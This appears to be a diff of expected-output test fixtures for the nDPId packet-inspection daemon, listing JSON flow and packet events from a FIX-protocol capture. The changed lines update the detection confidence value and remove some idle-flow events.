00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"} -00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 